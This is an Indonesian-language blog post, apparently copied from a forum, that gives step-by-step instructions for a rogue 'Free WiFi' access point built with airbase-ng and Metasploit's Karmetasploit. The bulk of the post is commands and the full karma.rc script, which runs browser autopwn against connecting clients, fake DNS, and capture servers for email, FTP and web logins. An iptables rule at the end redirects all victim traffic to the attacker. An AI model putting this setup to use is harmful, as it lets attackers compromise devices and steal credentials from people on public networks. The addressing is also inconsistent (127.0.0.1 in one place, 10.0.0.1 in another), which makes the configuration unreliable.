Make Wifi using metasploit

Sabtu, 14 April 2012

Assalamualaikum war,wab,,.

Membahas metasploit buat linuxer tentu tidak akan ada habisnya,
sebab salah satu senjata andalan saya ini adalah tools yang powerfull
karena memiliki banyak sekali rahasia yang belum terbongkar.. wkwkkw
Nah, untuk kali ini kita akan coba membuat metasploit menjadi sebuah
wifi, wew cool ( Ganteng )..


tapi bagaimana bisa metasploit dibuat seperti itu sedangkan di dalam
packet metasploit tidak terinstall DHCP modules, terus routingnya gimana ?
eiittss.. ini adalah inti dari apa yang akan kita lakukan kali ini, kita akan
mengunakan bantuan pihak ke-3 hehehe
tutorial ini saya dapatkan dari teman chat saya di YM dari pakistan cyber
dan telah saya coba dengan menggunakan koneksi lintasarta menggunakan
server ION dengan OS Backtrack black hat edititon ( DEWA 9 )..

Baiklah saya anggap untuk semua laptop ataupun PC sudah terinstall
network card, setelah itu install aircrack

hmm.. itu lo yang biasa dipake buat scan pas hacking wifi
# svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
# make

Ok setelah terinstal di /usr/local/bin gunakan airmon untuk melakukan
pengecekan pada network card kita

# airmon-ng start [wlan0-atau apalah interface dari wifi anda]

selanjutnya runninga aireplay untuk melakukan verifikasi apakh anda fungsi
untuk injecting

# aireplay-ng –test [interface wifi anda]

09:10:02 Trying broadcast probe requests...
09:10:02 Injection is working!
09:10:04 Found 2 APs
09:10:04 Trying directed probe requests...

09:10:05 00:xx:d1:xx:98:xx - channel: 11 - 'Hotspot'
09:10:05 Ping (min/avg/max): 1.475ms/11.453ms/66.378ms Power: 6.67
09:10:05 28/30: 87%


09:10:06 0d:xx:B3:xx:79:xx - channel: 11 - 'Linksys'
09:10:06 Ping (min/avg/max): 2.482ms/2.678ms/6.568ms Power: 123.00
09:10:07 30/30: 100%
selanjutnya untuk DHCPnya menggunakan pihak ke-3 Tongue
/etc/dhcp/dhcp.conf

kita akan coba menggunakan ip 127.0.0.1/24
konfigurasinya

default-lease-time 60;
max-lease-time 72;

ddns-update-style none;

authoritative;

log-facility local7;


subnet 127.0.0.1 netmask 255.255.255.0 {
range 127.0.0.100 127.0.0.254;
option routers 127.0.0.1;
option domain-name-servers 127.0.0.1;
}


terus metasploinya ya jangan lupa Tongue

# svn co http://metasploit.com/svn/framework3/trunk msf3

kita masuk ke intinya menggunakan karmetasploit sebelum kita menjalankannya
databse yang valid yang utama harus dibutuhkan untuk itu saya hanya
mengikuti tutornya menggunakan RubyGems ( Gem )
dan mengunakan sqlite3 runnya pake aja command

# apt-get install libsqlite3-dev
# gem install activerecord sqlite3-ruby

terakhir menjalankan karmetasploit namun sebelumnya ada 3 hal yang perlu
ditandai
1. airbase-ng > start with access point

# airbase-ng -P -C 30 -e “Free WiFi” -v [monitor-interface]

2. configurasi ip anda (at0)

# ifconfig at0 up 127.0.0.1 netmask 255.255.255.0

3. DHCP server coy jangan lupa pake interface yang udah kita buat pake
airbase tadi

# dhcpd -cf /etc/dhcpd.conf at0
selanjutnya melakukan configurasi dari metasploitnya dalam hal ini kita
akan menggunakan tools KARMA dari metasploit untuk melakukan konfigurasi
agr AP kita tadi lancar dengan menggunkan IP 127.0.0.1



http://digitaloffense.net/tools/karma.rc

load db_sqlite3
db_create /root/karma.db

use auxiliary/server/browser_autopwn

setg AUTOPWN_HOST 10.0.0.1
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads

set LHOST 10.0.0.1
set LPORT 45000
set SRVPORT 55550
set URIPATH /ads

run

use auxiliary/server/capture/pop3
set SRVPORT 110
set SSL false
run

use auxiliary/server/capture/pop3
set SRVPORT 995
set SSL true
run

use auxiliary/server/capture/ftp
run

use auxiliary/server/capture/imap
set SSL false
set SRVPORT 143
run

use auxiliary/server/capture/imap
set SSL true
set SRVPORT 993
run

use auxiliary/server/capture/smtp
set SSL false
set SRVPORT 25
run

use auxiliary/server/capture/smtp
set SSL true
set SRVPORT 465
run

use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 5353
run

use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 53
run

use auxiliary/server/capture/http
set SRVPORT 80
set SSL false
run

use auxiliary/server/capture/http
set SRVPORT 8080
set SSL false
run

use auxiliary/server/capture/http
set SRVPORT 443
set SSL true
run


use auxiliary/server/capture/http
set SRVPORT 8443
set SSL true
run
run scriptnya dengan metasploit

# msfconsole -r karma.rc

finished..

akan tetapi permasalahnnya sering kali client melakukan koneksi ke AP dengan
DNS entrie untuk mesinnya tetap memilki cached, Alih-alih bertanya modul
Metasploit untuk nama DNS, itu malah akan mencoba untuk terhubung secara
langsung ke alamat IP target apa pun yang memiliki cache. Ini evades perangkap DNS,
tapi ada solusi cepat,Aturan iptables akan mengarahkan ulang seluruh lalu lintas
jaringan pada interface AP kembali ke sistem.
gunakan command

# iptables -t nat -A PREROUTING -i at0 -j REDIRECT

finish it,,
wassalam

source : http://0nto.me/

referensi : metasploit

Copy At IBT Forum

0 comments:

Posting Komentar